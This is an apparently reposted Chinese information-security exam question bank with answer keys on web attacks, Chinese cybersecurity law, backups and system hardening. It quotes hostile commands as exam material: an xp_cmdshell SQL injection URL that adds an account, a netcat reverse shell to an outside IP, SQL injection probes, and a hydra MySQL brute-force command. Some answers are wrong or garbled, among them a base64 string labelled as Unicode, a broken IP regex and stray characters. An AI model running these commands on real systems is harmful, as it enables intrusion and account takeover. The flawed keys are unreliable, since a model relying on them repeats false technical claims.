[转]信息安全相关理论题(六)

1. 对以下URL的说明正确的是：http://192.168.1.77/show.asp?id=52;exec master.dbo.xp_cmdshell ‘net user test /add’ ( )【BCD】
   A、试图通过操作系统cmd.exe来添加帐户
   B、试图通过该URL实施SQL注入攻击
   C、试图调用xp_cmdshell存储过程执行系统命令
   D、试图增加test帐户

2. 应从哪几方面审计windows系统是否存在后门( )【ABCD】
   A.查看服务信息
   B.查看驱动信息
   C.查看注册表键值
   D.查看进程信息

3. 在Apache上，有个非常重要的安全模块Mod_Security ，下面哪些是这个模块具备的功能：（ ）【BCD】
   A、基于IP的访问控制
   B、缓冲区溢出的保护
   C、对SQL注入有一定的防止作用
   D、对请求方法和请求内容，进行过滤控制

Oracle数据库中如何设置audit trail审计，正确的说法是：（ ）【ABD】
A、在init.ora文件中设置"audit_trail = true"或者"audit_trail = db"
B、以SYSDBA身份使用AUDIT ALL ON SYS.AUD$ BY ACCESS,语句对audit trail审计
C、Oracle不支持对audit trail的审计
D、在设置audit trail审计前，要保证已经打开Oracle的审计机制

对于默认安装的JBoss4.3中间件，可能存在的安全问题？（ ）【AB】
A. 远程命令执行漏洞
B. 远程部署war包
C. SQL注入漏洞
D. xss跨站漏洞

下列哪些中间件默认页面存在JAVA反序列化漏洞？（ ）【ACD】
A. JBoss
B.IIS7
C. weblogic
D.websphere

常见网站敏感信息泄漏的文件类型有哪些？（ ）【AB】
A..bak
B..ini
C..js
D..html

典型数据库安全攻击方式包括（ ）？【ABCD】
A.SQL注入
B.网络窃听
C.密码猜解
D.未授权访问
E. 包含漏洞
F. 文件上传漏洞

1.为了加强防病毒网关对病毒文件或高风险文件的拦截，需要对含有以下后缀的文件进行直接删除（多选）：（ ） 【ABCDG】
A、.exe
B、.vbs
C、.bat
D、.js
E、.bmp
F、.txt
G、*.com

2.要判断远程服务器是否开放某些TCP端口，可以使用以下哪些工具进行探测扫描？ （ ）【ACDEF】
A．Telnet
B．Ping
C．Nmap
D. ZenMap
E．Nessus
F. SQLMap

3.思科交换机上的ACL有以下特点：（ ） 【AB】
A．需要把ACL绑定到端口
B．必须绑定到端口的in或out方向
C．可识别UDP会话状态
D. 可判断流量是否为HTTP协议

4.以下哪些协议没有保护用户密码等机密信息在网络上的传输安全：（ ）【ABC】
A．SMTP
B．POP3
C．FTP
D. SSH
E. HTTPS

1 建设关键信息基础设施应当确保其具有支持业务稳定、持续运行的性能，并保证安全技术措施________。 ABD
A．同步规划 
B．同步建设  
C．同步投运  
D．同步使用

2 电力二次系统安全防护策略包括________。 ABCD
A．安全分区 
B．网络专用 
C．横向隔离 
D．纵向认证

3 公司秘密包括________两类。 AC
A．商业秘密 
B．个人秘密 
C．工作秘密 
D．部门文件

4 国家采取措施，来源于中华人民共和国境内外的网络安全风险和威胁，保护关键信息基础设施免受攻击、侵入、干扰和破坏。 ABC
A．监测  
B．防御  
C．处置 
D．隔离
 
5 信息安全“三个不发生”是指____。 ABC
A．确保不发生大面积信息系统故障停运事故 
B．确保不发生恶性信息泄密事故 
C．确保不发生信息外网网站被恶意篡改事故 
D．确保不发生信息内网非法外联事故
 
6 下列情况违反“五禁止”的有________。 ABCD
A．在信息内网计算机上存储国家秘密信息 
B．在信息外网计算机上存储企业秘密信息
C．在信息内网和信息外网计算机上交叉使用普通优盘
D．在信息内网和信息外网计算机上交叉使用普通扫描仪

7 网络运营者收集、使用个人信息，应当遵循______________的原则，公开收集、使用规则，明示收集、使用信息的目的、方式和范围，并经被收集者同意。 BCD
A．真实 B．合法 C．正当 D．必要

8 下列关于网络信息安全说法正确的有_______。 AC
A．网络运营者应当对其收集的用户信息严格保密
B．网络运营者应妥善管理用户信息，无需建立用户信息保护制度
C．网络运营者不得泄露、篡改、毁损其收集的个人信息
D．在经过处理无法识别特定个人且不能复原的情况下，未经被收集者同意，网络运营者不得向他人提供个人信息。

9 下列关于内外网邮件系统说法正确的有________。ABCD
A．严禁使用未进行内容审计的信息内外网邮件系统
B．严禁用户使用默认口令作为邮箱密码
C．严禁内外网邮件系统开启自动转发功能
D．严禁用户使用互联网邮箱处理公司办公业务

10 网络运营者，是指________。 BCD
A．网络运维者 B．网络所有者 C．网络服务提供者 D．网络管理者

11 下列关于网络安全法的说法错误的有________。 AB
A．国家规定关键信息基础设施以外的网络运营者必须参与关键信息基础设施保护体系。
B．关键信息基础设施的运营者可自行采购网络产品和服务不通过安全审查。
C．网络运营者应当加强对其用户发布的信息的管理，发现法律、行政法规禁止发布或者传输的信息的，应当立即向上级汇报。
D．国家网信部门应当统筹协调有关部门加强网络安全信息收集、分析和通报工作，按照规定统一发布网络安全监测预警信息。

12 某单位信息内网的一台计算机上一份重要文件泄密，但从该计算机上无法获得泄密细节和线索，可能的原因是________。 ABCD
A．该计算机未开启审计功能 B．该计算机审计日志未安排专人进行维护
C．该计算机感染了木马 D．该计算机存在系统漏洞

13 网络安全事件发生的风险增大时，省级以上人民政府有关部门应当按照规定的权限和程序，并根据网络安全风险的特点和可能造成的危害，采取下列措施_______。ACD
A．要求有关部门、机构和人员及时收集、报告有关信息
B．加强对网络安全风险的监测
C．组织有关部门、机构和专业人员，对网络安全风险信息进行分析评估
D．向社会发布网络安全风险预警，发布避免、减轻危害的措施

14 因网络安全事件，发生突发事件或者生产安全事故的，应当依照_______等有关法律、行政法规的规定处置。 BC
A．《中华人民共和国网络安全法》
B．《中华人民共和国突发事件应对法》
C．《中华人民共和国安全生产法》
D．《中华人民共和国应急法》

15 网络安全事件应急预案应当按照事件发生后的________、________等因素对网络安全事件进行分级。 AB
A．危害程度 B．影响范围 C．事件等级 D．关注程度

1. 信息安全方针和策略的流程是（）。【 ABC】
   A．安全方针和策略 B．资金投入管理 C．信息安全规划 D．以上都不是
2. 从系统整体看，下述那些问题属于系统安全漏洞。 【ABC】
   A、产品缺少安全功能 B、产品有Bugs C、缺少足够的安全知识 D、人为错误
3. 应对操作系统安全漏洞的基本方法是什么？。【 AB】
   A、对默认安装进行必要的调整 B、给所有用户设置严格的口令
   C、及时安装最新的安全补丁 D、更换到另一种操作系统
4. 计算机安全事故包括以下几个方面（）。【ABCD】
   A．因自然因素，导致发生危害计算机信息系统安全的事件
   B．因自然因素，进入可能导致危害计算机信息系统安全的非正常运行状态的事件
   C．因人为原因，导致发生危害计算机信息系统安全的事件
   D．因人为原因，进入可能导致危害计算机信息系统安全的非正常运行状态的 事件
5. 病毒防护必须具备哪些准则。【ABCD】
   A、拒绝访问能力 B、病毒检测能力
   C、控制病毒传播的能力 D、清除能力、恢复能力、替代操作
6. 防火墙管理员应承担下面哪些责任：（）。【 ABCD】
   A．规划和部署，策略制定，规则配置与测试 B．防火墙状态监控
   C．防火墙日志审计分析 D．安全事件的响应处理
7. 应建立计算机信息网络安全管理组织的联网单位有：（）。【ABC】
   A、各互联网接入服务单位 B、信息服务单位
   C、专线接入互联网的单位 D、所有接入互联网的单位
8. 实行计算机安全事故和计算机案件报告制度是（）。【ABCD】
   A、是计算机信息系统安全监察和安全防范、安全管理工作中的重要组成部分
   B、是贯彻落实有关安全法规，强化计算机信息系统安全管理的规范性要求
   C、是公安机关了解掌握计算机信息系统应用单位内部安全管理情况的手段
   D、是国家法规的要求，也是所有计算机使用单位和用户，以及公民应有的职责和义务

81.（ ）造成了我国信息安全技术实力较弱。
A.缺乏自主技术体系d B.对新兴技术信息安全反应过慢d C.对网络犯罪技术缺乏有效应对d D.没有掌握核心技术d E.对新兴技术信息盲目跟风d
82.我国互联网发展有哪些特征？（ ）
A.互联网经济快速发展dB.互联网的社会影响逐步加深dC.互联网规模持续扩大dD.互联网应用更新换代不断加快dE.以上都是正确的d
83.传统媒体的问题包括（ ）。
A.失去新闻的时效性dB.失去舆论话语权dC.不符合用户导向性dD.新闻与传播的脱节dE.传统新闻业诸多改革壁垒d
84.用好管好互联网的四个理念包括（ ）。
A.依法管网理念d B.以人管网理念d C.技术管网理念d D.以德管网理念 E.综合管网理念d
85.自媒体的四个属性包括（ ）。
A.自然dB.自有dC.自我dD.自理E.自律d
86.微博博主的主要类型包括（ ）。
A.自我表达型dB.社交活跃型dC.官方阐述型D.话题讨论型dE.潜水偷窥型d
87.医患关系中医患纠纷的原因主要包括（ ）。
A.政府方面dB.媒体方面dC.患者方面dD.医院方面dE.以上都是d
88.现在，我们处在IT变革的时代，云计算带来了许多新的变化，包括（）。
A.数据处理模式从集中走向分散B.数据处理模式从分散走向集中dC.用户界面更加人性化，可管理性和安全性大大提高dD.网络无处不在，连接无处不在dE.通讯和信息处理方式将全面网络化，并实现前所未有的系统扩展能力和跨平台能力d
89.恶意代码是一些恶意的软件，是广义的病毒，它的特征包括（）。
A.目的是恶意的dB.目的并非恶意C.本身也是程序dD.通过执行发生作用dE.本身并非程序
90.在整个账户安全里，最重要的是实现强密码保护，实现强密码保护的措施包括（）。
A.设置密码时，避免包含个人信息dB.为防止忘记密码，将密码记录在电脑中C.不要将密码记录在电脑中d
D.使用不同的密码dE.设置密码时，混合使用大小写、数字符等d

1. 在局域网中计算机病毒的防范策略有______。(ADE)
   A.仅保护工作站 B.保护通信系统 C.保护打印机
   D.仅保护服务器 E.完全保护工作站和服务器
2. 在互联网上的计算机病毒呈现出的特点是______。(ABCD)
   A. 与互联网更加紧密地结合，利用一切可以利用的方式进行传播
   B. 具有多种特征，破坏性大大增强
   C. 扩散性极强，也更注重隐蔽性和欺骗性
   D. 针对系统漏洞进行传播和破坏
3. 一个安全的网络系统具有的特点是______。(ABCE)
   A. 保持各种数据的机密
   B. 保持所有信息、数据及系统中各种程序的完整性和准确性
   C. 保证合法访问者的访问和接受正常的服务
   D. 保证网络在任何时刻都有很高的传输速度
   E. 保证各方面的工作符合法律、规则、许可证、合同等标准
4. 任何信息安全系统中都存在脆弱点，它可以存在于______。(ABCDE)
   A.使用过程中 B.网络中 C.管理过程中
   D.计算机系统中 E.计算机操作系统中
5. ______是建立有效的计算机病毒防御体系所需要的技术措施。(ABCDE)
   A.杀毒软件 B.补丁管理系统 C.防火墙 D.网络入侵检测 E.漏洞扫描
6. 信息系统安全保护法律规范的作用主要有______。(ABCDE)
   A.教育作用 B.指引作用 C.评价作用 D.预测作用 E.强制作用
7. 根据采用的技术，入侵检测系统有以下分类：______。(BC)
   A.正常检测 B.异常检测 C.特征检测 D.固定检测 E.重点检测
8. 在安全评估过程中，安全威胁的来源包括______。(ABCDE)
   A.外部黑客 B.内部人员 C.信息技术本身 D.物理环境 E.自然界
9. 安全评估过程中，经常采用的评估方法包括______。(ABCDE)
   A.调查问卷 B.人员访谈 C.工具检测 D.手工审核 E.渗透性测试
10. 根据ISO定义，信息安全的保护对象是信息资产，典型的信息资产包括______。(BC)
    A.硬件 B.软件 C.人员 D.数据 E.环境
11. 根据ISO定义，信息安全的目标就是保证信息资产的三个基本安全属性，包括__。(BCD)
    A.不可否认性 B.保密性 C.完整性 D.可用性 E.可靠性
12. 治安管理处罚法规定，______行为，处5日以下拘留；情节较重的，处5日以上10日以下拘留。(ABCD)
    A. 违反国家规定，侵入计算机信息系统，造成危害的
    B. 违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常运行的
    C. 违反国家规定，对计算机信息系统中存储、处理、传输的数据和应用程序进行删除、修改、增加的
    D. 故意制作、传播计算机病毒等破坏性程序，影响计算机信息系统正常运行的
13. 网络蠕虫病毒越来越多地借助网络作为传播途径，包括______。(ABCDE)
    A.互联网浏览 B.文件下载 C.电子邮件 D.实时聊天工具 E.局域网文件共享
14. 在信息安全管理中进行安全教育与培训，应当区分培训对象的层次和培训内容，主要包括__(ABE)
    A.高级管理层 B.关键技术岗位人员 C.第三方人员 D.外部人员 E.普通计算机用户
15. 网络入侵检测系统，既可以对外部黑客的攻击行为进行检测，也可以发现内部攻击者的操作行为，通常部署在______。(BC)
    A. 关键服务器主机 B. 网络交换机的监听端口 C. 内网和外网的边界 D. 桌面系统 E. 以上都正确

1.有一类加密算法，使用的加密密钥和解密密钥可以不同，这种加密算法称为：（ ）。 【非对称加密算法】
2.0 day漏洞指的是什么类型的漏洞： （ ） 【厂家尚未公布修复补丁的漏洞】
3.网络攻击行为中，“撞库”攻击指的是：（ ） 【使用泄漏的或已知的密码进行账号暴力猜测】
4.你正在https://soc.csair.com网页上输入用户名密码，如何知道这个网页不是假冒的南航网站？（ ） 【查看数字证书信任关系】
5.入侵检测系统（IDS）需要侦听一个交换机网口上的进出流量，IDS接到交换机上，并设置交换机。这个设置操作称为：（ ） 【端口镜像/span/mirror】
6.为了防止硬盘的物理损坏导致数据丢失，使用磁盘冗余技术RAID5。3块2G的硬盘构成RAID5后，可用磁盘空间为多少？（ ） 【4G】
7.DNS区域传输漏洞导致的直接后果是什么？ （ ） 【可以直接获取DNS域名全部记录信息】
8.Google Hacking是如何实现攻击的？ （ ） 【通过Google搜索网站敏感信息或找到网站特定漏洞】
9.在Linux系统中，给普通用户授予部分管理员权限的方法叫（ ）。【sudo】
10.说出一种曾经出现过上传文件绕过漏洞的Web应用：（ ）。【IIS/apache】
11.Linux用户密码密文存在哪个文件中：（ ）。【/etc/shadow】
12.在Windows中要看到进程启动的路径和参数，例如“C:\WINDOWS\System32\svchost.exe -k netsvcs”，需要使用的命令是：（ ）【wmic】
13.默认配置情况下，在XP系统上，使用什么命令可以探测到目标网络对端的主机是Windows或Linux：（ ） 【ping】
14.Linux系统中，当用ls命令列出文件时，可以看到文件的权限设置：-rwxrwxrwx；分3组rwx ，其中中间的一组rwx是给什么用户的权限？（ ）。【文件所在组成员权限】
15.要远程访问Windows服务器的共享文件夹，服务器需要开通的端口号是：（ ）。 【445】
16.安全部门发现一个网站存在文件上传漏洞，可是系统开发是外包的，不能修改代码，运维人员应采取什么措施？ （ ）【取消目录的web脚本执行权限】
17.802.1x通常使用于准入认证，它是属于OSI模型的哪层协议？（ ） 【二层/数据链路层】
18.在APT攻击中，C&C指的是（ ） 【控制中心】
19.SQL server数据库中存储过程能执行系统命令（ ）。【xp_cmdshell】
20.WINDOWS系统中，在cmd下运行命令可以查看到当前共享情况 （ ）。【net share】
21.31 国家保护____、和________依法使用网络的权利。 公民、法人和其他组织
22.32 网络安全法中网络运行安全规定，国家实行_____网络安全等级保护_____制度。
23.33 网络产品、服务应当符合__相关国家标准____的强制性要求。
24.34 网络关键设备和网络安全专用产品应当按照相关国家标准的强制性要求，由____具备资格的机构____安全认证合格或者安全检测符合要求后，方可销售或者提供。
25.35 网络运营者_____为用户办理网络接入、域名注册服务。
26.36 国家实施___网络可信身份战略，支持研究开发安全、方便的电子身份认证技术，推动不同电子身份认证之间的互认。
27.37 网络运营者应当为公安机关、国家安全机关依法维护国家安全和侦查犯罪的活动提供_技术支持_和__协助。
28.
29.38 关键信息基础设施的运营者采购网络产品和服务，应当按照规定与提供者签订_____安全保密协议__，明确安全和保密义务与责任。
30.39 定期组织关键信息基础设施的运营者进行网络安全__应急演练__，提高应对网络安全事件的水平和协同配合能力。
31.40 网络运营者应对其收集的用户信息严格保密，并建立健全____用户信息保护制度_____。

2. 443端口是__https__服务使用的
3. PING 是使用 TCP/IP 协议中的_ICMP__协议
4. Linux远程SSH远程管理服务的端口是__22__, Windows远程终端管理服务的端口是___3389__.
5. 括号里的字符串是_ UNICODE编码 (UWluZ1RlbmcgU2VjdXJpdHk=)

1.OpenSSL心脏滴血漏洞出现在哪个工作环节，成功利用漏洞可能导致什么危害？【在检测SSL心跳信息时没有对信息进行严格检查，导致越界读取内存信息；成功利用漏洞可使黑客盗取用户账号】

2.恶意或诈骗邮件的特点（请举例说明）：【发件人邮箱是陌生人；附件有危险文件类型：*.vbs, *.exe, *.bat等；邮件内容诱导填写密码；有中奖信息之类利益诱惑内容】

3.请说明跨站脚本（XSS）漏洞被利用的方法和可能导致的后果。（请说明存储和反射XSS漏洞被利用的场景，被攻击的对象，以严重程度。）
【反射型XSS漏洞利用场景：用户可能被引诱点击带攻击代码的URL，导致用户把恶意代码发送到存在漏洞的服务器，而服务器会把恶意代码返回给用户浏览器并执行，导致用户的会话cookie被窃取，进而会话被劫持。存储型XSS漏洞利用场景：把带有恶意代码的URL发布在存在漏洞的网站上，引诱用户点击，服务器返回恶意代码，导致用户浏览器执行恶意代码，并在此网站执行用户未知的操作，可能导致连锁反应，形成蠕虫攻击】

4.您作为企业信息安全工程师，请指导企业员工如何做好PC防病毒。（请从PC电脑技术和员工意识方面说明）
【至少有以下关键点：自动安装补丁，启用防火墙，安装防病毒软件；不要点击陌生邮件附件和链接，不要运行陌生人发来的软件，避免使用U盘】

5.Windows server操作系统默认安装后开放一些端口（禁用防火墙情况下），请您分析这些端口对用户开放存在哪些安全风险。
【至少说明默认开放TCP445,3389,139端口；445，139端口容易被病毒攻击，共享可能被远程访问，远程安装软件；3389端口也曾经有漏洞，可能导致蓝屏，远程桌面容易被控制】

41 国家网信部门应当统筹协调有关部门对关键信息基础设施的安全保护采取哪些措施？
答：应采取如下措施：
（1） 对关键信息基础设施的安全风险进行抽查检测，提出改进措施，必要时可以委托网络安全服务机构对网络存在的安全风险进行检测评估；
（2） 定期组织关键信息基础设施的运营者进行网络安全应急演练，提高应对网络安全事件的水平和协同配合能力；
（3） 促进有关部门、关键信息基础设施的运营者以及有关研究机构、网络安全 服务机构之间的网络安全信息共享；
（4） 对网络安全事件的应急处置与网络功能的恢复等，提供技术支持和协助。

42 网络安全事件发生的风险增大时，省级以上人民政府有关部门应当采取哪些措施？
答：应采取下列措施：
（1） 要求有关部门、机构和人员及时收集、报告有关信息，加强对网络安全风 险的监测；
（2） 组织有关部门、机构和专业人员，对网络安全风险信息进行分析评估，预测事件发生的可能性、影响范围和危害程度；
（3） 向社会发布网络安全风险预警，发布避免、减轻危害的措施。

1、简述DOS和DDOS的区别：
答：DOS意思是 Denial of service 的缩写，也就是网络产生的初期，用一台高配的设备去攻击一台低配的设备，造成被攻击的设备死机
DDOS意思是 Distributed Denial of service 的缩写，随着技术的进步，IT设备的配置都在飞速增长，DOS的方式已经变的水土不服，那就产生了分布式的DOS，形象的说就是我一个人打不过你，那我可以多叫几个兄弟过来揍你，我可以雇佣很多打手，（也就是控制很多傀儡机）这样的攻击就是DDOS

2、信息安全的基本属性主要表现在哪几个方面?
答：（1）完整性（Integrity） （2）保密性（Confidentiality） （3）可用性（Availability） （4）不可否认性（Non-repudiation） （5）可控性（Controllability）

3、PMI与PKI的区别主要体现在哪些方面？
答：PKI证明用户是谁，并将用户的身份信息保存在用户的公钥证书中；
PMI证明这个 用户有什么权限，什么属性，能干什么，并将用户的属性信息保存在授权证书中。

4、请回答数据容灾的四个层次？
第0级 本地备份、保存的冷备份
第1级本地备份和异地保存的冷备份
第2级热备份站点备份
第3级活动互援备份

5、请简述网站保护的方法？
答：方法一：提高网站代码的质量，对客户端输入的内容做好检测和过滤。
方法二：部署WEB防火墙（WAF产品），用设备来替代程序做好检测和过滤。

6、什么是数字签名？并简述数字签名与数字签名验证有何区别？
数字签名技术是将摘要信息用发送者的私钥加密，与原文一起传送给接收者。接收者只有用发送者的公钥才能解密被加密的摘要信息，然后用HASH函数对收到的原文产生一个摘要信息，与解密的摘要信息对比。如果相同，则说明收到的信息是完整的，在传输过程中没有被修改，否则说明信息被修改过，因此数字签名能够验证信息的完整性。
数字签名是个加密的过程，数字签名验证是个解密的过程。

1. 在WEB日志中发现这条访问请求记录，请说说您的看法( GET http://www.hack.cn/hack.php?cmd=nc 58.96.180.251 8080 -e /bin/bash 200 )
   答：攻击者使用netcat进行反弹链接，使服务器和IP地址为58.96.180.251的监听主机的8080端口建立连接，获得CMDSHELL。HTTP状态码为200，请求提交成功。

2. 如何判断sql注入，有哪些方法, 为什么有的时候没有错误回显，用php举例
   答：问题一：可以采取手工检测和工具检测。
   （1）手工检测：打开一个页面，可用and 1=1和and 1=2手工检测。例如：
   例如：http://www.xudandan.com/news.php?id=4536 and 1=1（数值型)
   返回页面正常
   http://www.xudandan.com/news.php?id=4536 and 1=2
   返回页面异常（HTTP状态码为500）
   或者：http://www.xudandan.com/news.php?id=4536 and ‘1’=’1’（字符串型）
   http://www.xudandan.com/news.php?id=4536 and ‘1’=’2’
   与上述类似情况
   综上判断，该网站存在sql注入点。
   （2）工具有啊D，明小子旁注

问题二：由于关闭了php的错误提示，linux中在安装php的目录下修改php.ini文件的相关配置信息。

3. xss的发生场景？如果给你一个XSS漏洞，你还需要哪些条件可以构造一个蠕虫？
   答：攻击者发现XSS漏洞后注入恶意代码到网页，使用户加载网页并执行恶意代码，攻击成功后可得到用户的cookie信息、未加密的敏感信息等。

4. CSRF漏洞的本质是什么？防御CSRF都有哪些方法？
   答：CSRF漏洞的本质是攻击者可以盗用受害者的身份，以受害者的名义发送恶意请求，对服务器来说这个请求是合法的。所以它又被称为“冒充用户之手”。
   CSRF攻击的思想是：受害者A登录某个受信网站T，在本地生成一个cookie，并在不登出网站T的前提下访问危险网站D，A访问D时执行攻击者构造的恶意代码，浏览器就会自动带着A产生的cookie信息请求访问T，T认为请求为A发起的，D就达到了伪造用户身份操作的目的。
   防御CSRF的方法：
   （1）token验证；
   （2）验证HTTP头的Referer

5. webshell检测，有哪些方法？
   答：静态特征检测：根据恶意字符串特征库，在脚本文件中检查是否匹配，这种方法容易误报和漏报。
   动态特征检测：把webshell特有的HTTP请求/响应做成特征库，加到IDS里面去检测所有的HTTP请求，但是由于未必能抓取全部的动态特征，必定会导致漏报。

6. 简述Linux系统安全加固需要做哪些方面
   答：（1）安装最新的Linux发行版本，及时升级系统软件和内核；
   （2）遵循最小服务原则，关闭不必要的端口和服务；
   （3）删除或禁用可能无用的账户和用户组，限制root的远程访问；
   （4）设置密码策略满足复杂度要求；
   （5）检查重要目录和文件权限，例如去掉不必要的s权限；
   （6）根据具体情况设置iptables防火墙规则；
   （7）启用安全审计，并对入侵相关重要日志进行硬拷贝；

7. 简述你需要针对一个目标渗透测试的步骤
   答：（1）信息收集。例如：Google Hacking，whois查询，或者使用社会工程学等；
   （2）漏洞扫描。
   （3）漏洞分析。综合收集的信息，例如漏洞扫描的结果，服务器的配置，防火墙的情况等，根据这些信息分析开发或者得到公开的渗透代码；
   （4）利用找到的目标系统的漏洞进行渗透入侵，从而得到管理权限并提权 ；
   （5）收集需要的、有用的信息；
   （6）清除日志；
   （7）生成渗透报告。

8.请写一条正则表达式，用于匹配ip地址
答：（（25[0-5]|2[0-4]/d|[01]?/d?/d）/.）{3}（25[0-5]|2[0-4]/d|[01]?/d?/d）

9.请用sed命令，删除一个文件中所有的换行符

10.请写出hydra暴力破解mysql的命令，字典名为mysql_pass.txt
答：hydra –P mysql_pass.txt –Vv –e n –o save.log 192.168.1.1 mysql

1、简述计算机网络安全的定义
网络安全是指计算机网络系统中的硬件、数据、程序等不会因为无意或恶意的原因而遭到破坏、篡改、泄露，防止非授权的使用或访问，系统能够保持服务的连续性，以及能够可靠的运行。
2、什么是系统安全政策？
安全政策。定义如何配置系统和网络，如何确保计算机机房和数据中心的安全以及如何进行身份鉴别和身份认证。同时，还确定如何进行访问控制、审计、报告和处理网络连接、加密和反病毒。还规定密码选择、账户到期、登录尝试失败处理等相关领域的程序和步骤。
3、如果一个组织（或企业）的系统安全管理或网络管理人员，接到人事部门通知被解职，应该按照一般的安全策略执行那些安全措施？
一个员工离开单位，他的网络应用账户应及时被禁用，他的计算机接入应立即禁止。如果配有便携笔记本式计算机或其它相关硬件设备，应及时进行收回。同时，在员工离职时，他们的身份验证工具如：身份卡、硬件令牌、智能卡等都同时收回。无论离职员工何时是否离开，一旦得知该员工即将离职，应对其所能够接触到的信息资源（尤其是敏感信息）进行备份处理。因为，一般情形下，员工的离职是一个充满情绪化的时期，尽管大多数人不会做出什么过分之举，但是保证安全总比出了问题再补救要有效。
总之，无论是雇佣策略还是雇佣终止策略，都有需要考虑当地的政治和法律因素。在制定策略时，应避免出现如性别和种族歧视等违反法律或一般道德规范的条款。
4、简述计算机网络攻击的主要特点。
①损失巨大。由于攻击和入侵的对象是网络上的计算机，所以一旦他们取得成功，就会使网络中成千上万台计算机处于瘫痪状态，从而给计算机用户造成巨大的经济损失。
②威胁社会和国家安全。一些计算机网络攻击者出于各种目的经常把政府要害部门和军事部门的计算机作为攻击目标，从而对社会和国家安全造成威胁。
③手段多样，手法隐蔽。计算机攻击的手段可以说五花八门。
④以软件攻击为主。几乎所有的网络入侵都是通过对软件的截取和攻击从而破坏整个计算机系统的。
5、简述信息系统风险评估（风险分析）的主要内容。
（又称风险分析）指将可能发生的安全事件所造成的损失进行定量化估计。如某类安全事件发生的概率、此类安全事件发生后对组织的数据造成的损失、恢复损失的数据需要增加的成本等。
一般情况下，只有结束数据资产评估后，才能进行风险评估。只有认定具有价值或价值较高的数据才有必要进行风险评估。
6、简述比较数据完全备份、增量备份和差异备份的特点和异同。
①完全备份：指将所有的文件和数据都备份到存储介质中。完全备份的实现技术很简单，但是需要花费大量的时间、存储空间和I/O带宽。它是最早的、最简单的备份类型。
②差异备份：对上一次完全备份之后才进行改变的数据和文件才需要进行复制存储。差异备份与完全备份相比，只需要记录部分数据，更为迅速。
差异备份分为两个步骤：
第一步，制作一个完全备份；
第二步，对比检测当前数据与第一步骤中完全备份之间的差异。故差异备份必须在一次完全备份之后才可能开始，而且需要定时执行一次完全备份。这时的“定时”时间段取决于预先定义的备份策略。
差异备份的恢复也分为两个步骤：
第一步，加载最后一次的完全备份数据；
第二步，使用差异备份的部分来更新变化过的文件。
优点：差异备份在备份速度上比完全备份快。但是在备份中，必须保证系统能够计算从某一个时刻起改变过的文件。所以从空间上，差异备份只需要少量的存储空间就可以对文件或数据实现备份。
③增量备份：仅仅复制上一次全部备份后或上一次增量备份后才更新的数据。它与差异备份相类似，与差异备份相比，只需要备份上一次任何一种备份之后改变的文件。所以，其备份速度更快。但是，增量备份数据或文件的恢复方法稍微复杂，它需要在某个完全备份恢复的数据基础上，然后将该时间点以后所有的增量备份都更新到数据库中。其备份空间占据，比差异备份所需的空间更少。
每种备份方式都各有优缺点，采用时，需要在备份策略中仔细评估每一种备份方式的时用性，最终选择备份方法。
备份类型比较表：
7、说明信息安全等级保护一般分为几个等级，并简述第三级信息安全保护的要求内容。
信息系统根据其在国家安全、经济建设、社会生活中的重要程度，遭到破坏后对国家安全、社会秩序、公共利益以及公民、法人和其他组织的合法权益的危害程度等，由低到高划分为五级。
具体的安全保护等级划分为以下五级：
第一级，信息系统受到破坏后，会对公民、法人和其他组织的合法权益造成损害，但不损害国家安全、社会秩序和公共安全。
第二级，信息系统受到破坏后，会对公民、法人和其他组织的合法权益产生严重损害，或者对社会秩序和公共利益造成损害，但不损害国家安全。
第三级，信息系统受到破坏后，会对社会秩序和公共利益造成严重损害，或者对国家安全造成损害。
第四级，信息系统受到破坏后，会对社会秩序和公共利益造成严重损害，或者对国家安全造成严重损害。
第五级，信息系统受到破坏后，会对国家安全造成严重损害。
8、物联网安全问题主要表现在那几个方面？
目前，互联网在发展过程中遇到了两大体系性瓶颈，一个是地址不够，另一个是网络的安全问题。地址的问题通过IPv6能够解决，但是网络安全问题目前却没有好的解决之道。如果不能解决网络的可管、可控以及服务质量问题，将会在很大程度上影响物联网的进一步发展。根据物联网自身的特点，物联网除了面对移动通信网络的传统网络安全问题之外,还存在着一些与已有移动网络安全不同的特殊安全问题。这是由于物联网是由大量的机器构成,缺少人对设备的有效监控,并且数量庞大,设备集群等相关特点造成的，这些安全问题主要有以下几个方面。
（1）物联网机器/感知节点的本地安全问题
由于物联网的应用可以取代人来完成一些复杂、危险和机械的工作。所以物联网机器/感知节点多数部署在无人监控的场景中。那么攻击者就可以轻易地接触到这些设备,从而对他们造成破坏,甚至通过本地操作更换机器的软硬件。
（2）感知网络的传输与信息安全问题
感知节点通常情况下功能简单（如自动温度计）、携带能量少（使用电池）,使得它们无法拥有复杂的安全保护能力,而感知网络多种多样,从温度测量到水文监控,从道路导航到自动控制,它们的数据传输和消息也没有特定的标准,所以没法提供统一的安全保护体系。
（3）核心网络的传输与信息安全问题
核心网络具有相对完整的安全保护能力,但是由于物联网中节点数量庞大,且以集群方式存在,因此会导致在数据传播时,由于大量机器的数据发送使网络拥塞,产生拒绝服务攻击。此外,现有通信网络的安全架构都是从人通信的角度设计的,并不适用于机器的通信。使用现有安全机制会割裂物联网机器间的逻辑关系。
（4）物联网业务的安全问题
由于物联网设备可能是先部署后连接网络,而物联网节点又无人看守,所以如何对物联网设备进行远程签约信息和业务信息配置就成了难题。另外,庞大且多样化的物联网平台必然需要一个强大而统一的安全管理平台,否则独立的平台会被各式各样的物联网应用所淹没,但如此一来,如何对物联网机器的日志等安
全信息进行管理成为新的问题,并且可能割裂网络与业务平台之间的信任关系,导致新一轮安全问题的产生。

1、分析信息安全的弱点和风险来源。
（1）信息安全的木桶理论
木桶理论：一个由许多长短不同的木板箍成的木桶，决定其容水量大小的并非是其中最长的那块木板或全部木板的平均值，而是取决于其中最短的那块木板。
在信息安全中，认为信息安全的防护强度取决于“信息安全防线”中最为薄弱的环节。即最薄弱的环节存在最大的安全威胁，只有针对该环节进行改进才能提高信息安全的整体防护强度。
（2）信息安全威胁的来源
信息威胁的来源于四个方面：技术弱点、配置失误、政策漏洞、人员因素。 ①典型技术弱点。
ACP/IP网络。由于其协议是一个开放的标准，主要用于互联网通信，开放的网络导致其不能保障信息传输的完整性和未经授权的存取等攻击手段做出适当的防护。
操作系统漏洞。主流操作系统如UNIX、Windows、Linux等，由于各种原因导致其存在漏洞，必须由系统管理员经过安全配置、密切跟踪安全报告以及及时对操作系统进行更新和补丁更新操作才能保证其安全性。
②配置失误。由于操作者执行安全操作不到位或对安全技术理解不透引起的配置失误。如：系统账户存在易被猜测的用户名和密码。管理员技术不足以适应岗位或由于疏忽、惰性的原因，未对默认的高权限系统账户进行处理。
